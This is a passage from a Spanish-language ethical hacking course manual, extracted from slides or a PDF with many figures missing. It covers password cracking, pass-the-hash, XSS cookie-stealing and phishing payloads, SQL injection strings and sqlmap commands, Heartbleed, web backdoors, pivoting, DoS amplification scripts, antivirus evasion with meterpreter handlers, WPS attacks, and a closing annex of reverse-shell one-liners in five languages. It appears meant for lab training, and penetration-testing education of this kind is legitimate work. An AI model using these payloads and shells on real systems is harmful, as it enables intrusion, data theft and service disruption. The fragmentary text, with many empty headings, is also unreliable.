3 = fuerza bruta
GPU (Graphics Processing Unit) son miles de veces mas rapidos que los
procesadores corrientes.
Registrarse: http://aws.amazon.com/
134
ETHICAL HACKING
http://www.nvidia.com/Download/Find.aspx
Instalar drivers
bash NVIDIA-Linux-x86_64-346.72.run
nvidia-smi -q | head
wget http://hashcat.net/files/cudaHashcat-2.01.7z
Desenpaquetar
7za x cudaHashcat-1.36.7z
135
ETHICAL HACKING
Testear hashcat
/opt/cuda/cudaHashcat64.bin -b
-m 1000 : NTLM
-a 3 = fuerza bruta
?a?a?a?a?a?a?a = Mascara
-m 2500: WPA/WPA2
-a 3: Fuerza bruta
?a?a?a?a?a?a?a?a?a = Mascara (Usar todos los caracteres)
136
ETHICAL HACKING
Cuando NO podemos crackear el has podemos usar esta tcnica que permite a
un atacante para autenticarse a un servidor mediante el hash en lugar de
requerir la contrasea en texto plano.
Info:
Server2003 Server2008
/usr/share/windows-binaries/PSTools
wce -s Administrador:[nombre-pc]:[hash]
137
ETHICAL HACKING
Atacando servicios
Telnet
138
ETHICAL HACKING
Pop3
SMTP
RDP
1. FTP
2. SSH
3. telnet
139
ETHICAL HACKING
11
WEB ATTACKS
140
ETHICAL HACKING
Port HTTP
80 Puerto por defecto
81 Puerto alternativo
82 Puerto alternativo
443 SSL
8080 Apache tomcat
8000 Puerto alternativo
8081 Puerto alternativo
7777 Oracle Server
9090 Cherokee/WebSphere
10000 Webmin
8443 Apache Tomcat SSL
5357 Web services
Crawling
owasp-zap
Web Fuzzing
dirbuster
141
ETHICAL HACKING
Usar:
Tipos de XSS
142
ETHICAL HACKING
Session hijacking
Usar http://[ip-bee-box]/bWAPP/xss_get.php
nc -nlvp 80
<script>
var img = new Image();
img.src = "http://[IP-atacante]/xss.php?"+document.cookie;
</script>
Phishing
nc -nvlp 80
Cdigo HTML
<br>
<FORM action="http://[IP]/xss.php" method="post">
Usuario <input type="text" name="username"> <br>
Password:<input type="password" name="pass"> <br>
<INPUT type="submit" value="Send">
</FORM>
Redireccion
143
ETHICAL HACKING
Deface
<script>document.body.innerHTML="<H1>
HACKED by me</H1>"</script>
Ofuscando XSS
<script> a=alert;a(9)</script>
Version normal
<script>alert(1)</script>
Usando ASCII
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49,
41))</script>
144
ETHICAL HACKING
<script>
for (var i=0;i<400;i++){
var img = new Image();
var url = "ftp://[ip-victima]:80/?"+i;
img.src = url;
}
</script>
Codificar en burpsuite
Xenotix (windows 8)
145
ETHICAL HACKING
Information Gathering
WAF Detection
Victim fingerprint
IP to geolocation
Network
Network IP (IP de la victima)
Ping Scan (GET puerto 80)
Browser
Fingerprint
Features detector
Scanner
Get scanner
http://www.altoromutual.com/search.aspx?txtSearch=abc
XSS explotation
Send message
Cookie thief
Keylogger
Grab screenshot (a veces )
Social engineering
Phiser - buscar logs.txt
Java driven by windows
Firefox addon
146
ETHICAL HACKING
Metodologa
Information gathering
SQLi detection
Lauch attack
Extract data
OS interaction (upload/download Files)
Compromise the network
147
ETHICAL HACKING
MySQL error
Oracle error
ODBC error
MS-SQL error
PostgreSQL error
148
ETHICAL HACKING
Probar login
Consulta:
Payloads
' or true--
' or ''='
' or 1--
' or 'x'='
'or '1'='1'--
Consulta:
149
ETHICAL HACKING
Payloads a probar
') or true--
') or ('')=('
') or 1--
') or ('x')=('
') or '1' ='1--
MS-SQL
150
ETHICAL HACKING
http://testasp.vulnweb.com/showforum.asp?id=convert(int,@@version)
MySQL
151
ETHICAL HACKING
PostgreSQL
abc' order by 15 #
152
ETHICAL HACKING
Nombre de tablas
Nombre de columnas
0x3a = :
0x7e = ~
Usando CAST para extraer 100 o mas tuplas (hasta 8192 caracteres)
abc' UNION ALL SELECT 1,(select CAST(group_concat(title,0x3a,imdb,0x7e)
AS CHAR(8192)) from (select title,imdb from movies limit 0,100) AS
mitabla),3,4,5,6,7#
Evil twin injection: Hacer un mapeo de las bases de datos > tablas > columnas
sqlmap -u "http://[ip]/bWAPP/sqli_1.php?title=iron&action=search"
--timeout=300 --random-agent --cookie="key=valor" --dbs
154
ETHICAL HACKING
-1 order by 2 --
sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=1"
--timeout=300 --random-agent --technique=U --dbms=mssql --dbs
Leer un archivo
155
ETHICAL HACKING
Escritura de archivos
URL: http://[ip-beebox]/bWAPP/sqli_13.php
156
ETHICAL HACKING
Generar payload
Heartbleed (2014)
157
ETHICAL HACKING
Confirmar vulnerabilidad
Explotar vulnerabilidad
cd /opt/ssl
python heartbleed.py 192.168.0.103 8443
Shellshock (2014)
Modificar el user-agent a:
158
ETHICAL HACKING
Webacoo
webacoo -g -o test.php
webacoo -t -u http://192.168.0.102/test.php
Weevely
Conectarse al backdoor
159
ETHICAL HACKING
12
PORT REDIRECTION
& TUNNELING
160
ETHICAL HACKING
Victima Linux
Iniciar el servicio
/etc/init.d/rinetd start
En el cliente (KALI)
161
ETHICAL HACKING
En la victima windows:
En el cliente (KALI)
162
ETHICAL HACKING
info:
En la victima windows:
/usr/share/windows-binaries/
netsh firewall add portopening TCP 1234 nombre excepcin enable all
En el cliente (KALI)
163
ETHICAL HACKING
En Kali
En el cliente (ubuntu):
164
ETHICAL HACKING
En el cliente (ubuntu) configurar el navegador web para que use proxy socks
127.0.0.1:1080. Todo el trafico sera redireccionado a 66.172.10.69:80.
165
ETHICAL HACKING
Establecemos el tnel:
En KALI:
vncviewer 127.0.0.1:3390
Password: linux2015
/usr/share/windows-binaries/plink.exe
166
ETHICAL HACKING
En la victima (Windows ) :
Donde:
3390: Puerto Remoto
3389 Puerto Local
En KALI:
rdesktop 127.0.0.1:3390
ssh -R 445:10.0.0.10:[email protected]
167
ETHICAL HACKING
Desde KALI:
Password: bug
168
ETHICAL HACKING
Configurar proxy:
En /etc/proxychains.conf
169
ETHICAL HACKING
Desde KALI:
Password: bug
/opt/pivoting/sshuttle/
170
ETHICAL HACKING
Pivote Windows
info:
/usr/share/windows-binaries/3proxy/
auth none
flush
external 10.0.0.3
internal 192.168.80.128
maxconn 300
socks -p 1080
Ejecutamos en Windows:
3proxy.exe 3proxy.cfg
171
ETHICAL HACKING
En /etc/proxychains.conf
Info:
172
ETHICAL HACKING
hts -F localhost:21 80
En el cliente
htc.exe -F 21 192.168.80.203:80
/usr/share/windows-binaries/httptunnel/
173
ETHICAL HACKING
ftp 127.0.0.1
Revisando el trafico:
174
ETHICAL HACKING
13
DENEGACION DE
SERVICIO DoS
175
ETHICAL HACKING
Inundacin ICMP
Amplificacin DNS
176
ETHICAL HACKING
-v Modo verbose
-n dominio a resolver
-o almacenar en archivo
Atacando:
-s IP a atacar
-n dominio a resolver
-p Paquetes a enviar por servidor DNS
Amplificacin NTP
177
ETHICAL HACKING
Realizar ataque:
cd /opt/DoS/ntpdos
python ntpdos.py 66.172.10.69 final_ntp.txt 2
Este tipo de ataques consume los recursos del servidor y de los dispositivos
intermediarios (firewalls, balanceadores de carga, etc)
Inundacin SYN
Hping3
Miles de paquetes SYN son enviados pero nunca responde con SYN/ACK
178
ETHICAL HACKING
-a false source IP
-V Modo verbose
Slow HTTP
/opt/DoS
179
ETHICAL HACKING
/root/Desktop/Laboratorio/Lab13-Web/bomb-xml.txt
auxiliary/dos/http/wordpress_xmlrpc_dos
SSL-Exhaustion attack.
180
ETHICAL HACKING
14
EVADIENDO WAF Y
ANTIVIRUS
181
ETHICAL HACKING
14. Antivirus
14.1.1. Encriptadores/Ofuscadores
Hyperion
cd /usr/share/windows-binaries/Hyperion-1.2
182
ETHICAL HACKING
Enigma Protector
http://www.enigmaprotector.com/
14.1.2. Frameworks
Ultimet
/opt/Evasion/antivirus/ultimet/
183
ETHICAL HACKING
Use exploit/multi/handler
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LPORT 4444
Shelter
/opt/Evasion/antivirus/shellter
cp /usr/share/windows-binaries/autorunsc.exe .
Iniciar
Wine shellter.exe
Use exploit/multi/handler
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LPORT 4444
184
ETHICAL HACKING
Veil framework
/opt/Evasion/antivirus/Veil-Evasion
Iniciar framework
python Veil-Evasion.py
Use exploit/multi/handler
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LPORT 4444
185
ETHICAL HACKING
Comparativa de frameworks
Datos de opswat.com4
https://www.opswat.com/resources/reports/antivirus-and-compromised-device-january-2015#antiviru
s-vendor-market-share
186
ETHICAL HACKING
15
ATTACKING
WIRELESS
187
ETHICAL HACKING
Terminologa
Monitorear
airodump-ng -i wlan0mon
188
ETHICAL HACKING
wash -i wlan0mon
Una ves que tengamos los datos ejecutamos reaver para obtener el PIN
-c Canal
-b MAC del AP
-K Habilitar ataque pixie dust
189
ETHICAL HACKING
Combinacin original:
10^8 (100 million)
Bully
190
ETHICAL HACKING
reaver
Des-autenticacion
191
ETHICAL HACKING
192
ETHICAL HACKING
193
ETHICAL HACKING
16
CIBER SEGURIDAD
194
ETHICAL HACKING
XVI. CIBER-SEGURIDAD
16. Historia
Fuente: http://en.wikipedia.org/wiki/Siberian_pipeline_sabotage
Fuente:http://www.foxnews.com/world/2013/01/31/new-york-times-say-its-
computer-networks-were-repeatedly-hacked-by-chinese/
Fuente:http://privacy-pc.com/articles/ssl-and-the-future-of-authenticity-c
omodo-hack-and-secure-protocol-components.html
Diginotar (2011)
195
ETHICAL HACKING
Fuente: http://www.f-secure.com/weblog/archives/00002228.html
Stuxnet (2010)
Fuente:http://www.forbes.com/2010/10/06/iran-nuclear-computer-technolo
gy-security-stuxnet-worm.html
196
ETHICAL HACKING
GhostNet (2009)
Fuente: http://www.defense.gov/pubs/pdfs/2010_CMPR_Final.pdf
Careto (2014)
Carbanak (2015)
197
ETHICAL HACKING
http://www.spiegel.de/international/business/the-secret-ways-of-little-kno
wn-chinese-telecoms-giant-huawei-a-875297.html
La CIA y la NSA
I freely admit that all nations spy. All nations conduct espionage.
But some nations, nations like ours, self-limit. We steal other
nations secrets to keep American safe and free. We dont do it to
make Americans rich or to make American industry profitable. And
what the Chinese are doing is industrial espionage, trade secrets,
198
ETHICAL HACKING
Fuente:http://globalpublicsquare.blogs.cnn.com/2013/02/27/hayden-chinese
-cyber-theft-on-unprecedented-scale/
199
ETHICAL HACKING
ANEXOS
200
ETHICAL HACKING
XVII. Anexos
Linux
201
ETHICAL HACKING
202
ETHICAL HACKING
Debug vs release
203
ETHICAL HACKING
Otros Flags
-lrpcrt4
-lws2_32
Python a exe
C:\Users\usuario\PyInstaller
204
ETHICAL HACKING
Hablitar SAFESEH
205
ETHICAL HACKING
Deshabilitar DEP/NX
The builds tools for v120 (Platform Toolset = 'v120') cannot be found
206
ETHICAL HACKING
concat(,)
Concatenacin + || ||
concat_ws(,)
207
ETHICAL HACKING
Sub-consultas v4.1>= Si Si Si
Procedimientos
No Si Si Si
almacenados
Consultas
No Si No Si
compuestas
208
ETHICAL HACKING
--comando
--current-user Usuario actual
--current-db Base de datos actual
--hostname Nombre de host
--is-dba Es DBA?
--users Enumerar usuarios
--passwords Enumerar passwords
--privileges Enumerar privilegios
Tipo entero:
209
ETHICAL HACKING
210
ETHICAL HACKING
.gz (gzip)*
Comprimir gzip -q file
gzip -d file.gz
Descomprimir
.bz2 (bzip2)**
bzip2 file
Comprimir
bunzip2 file
bzip2 -d file.bz2
Descomprimir
bunzip2 file.bz2
* gzip rpido pero menos compresin
** bzip2 mas lento pero mas compresin
.zip (zip)
Comprimir $ zip file.zip /files
Descomprimir unzip file.zip
Ver el contenido (sin
extraer) unzip -v file.zip
.rar (rar)
apt-get install rar # (instalar primero)
Comprimir rar a file.rar folder/
Descomprimir rar e file.rar
Ver el contenido (sin rar v file.rar
extraer) rar l file.rar
211
ETHICAL HACKING
/usr/share/windows-binaries
7z.exe x archivo.zip
Bash:
bash -i >& /dev/tcp/192.168.80.173/4444 0>&1
Perl:
perl -e 'use
Socket;$i="192.168.80.173";$p=4444;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin
/sh -i");};'
Python:
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST
REAM);s.connect(("192.168.80.173",4444));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP:
php -r '$sock=fsockopen("192.168.80.173",4444);exec("/bin/sh -i
<&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.80.173",4444).to_i;exec
sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
212
ETHICAL HACKING
Una vez se tenga una shell, ejecute este comando para obtener una
shell mas cmoda
213
ETHICAL HACKING
GLOSARIO
214
ETHICAL HACKING
XVIII. GLOSARIO
RAT (Remote Access Tool): Un RAT es una pieza de software que se utiliza
para acceder o controlar un ordenador de forma remota.
.
Worms (gusanos): Un gusano es un malware que tiene la propiedad de
duplicarse a s mismo.
215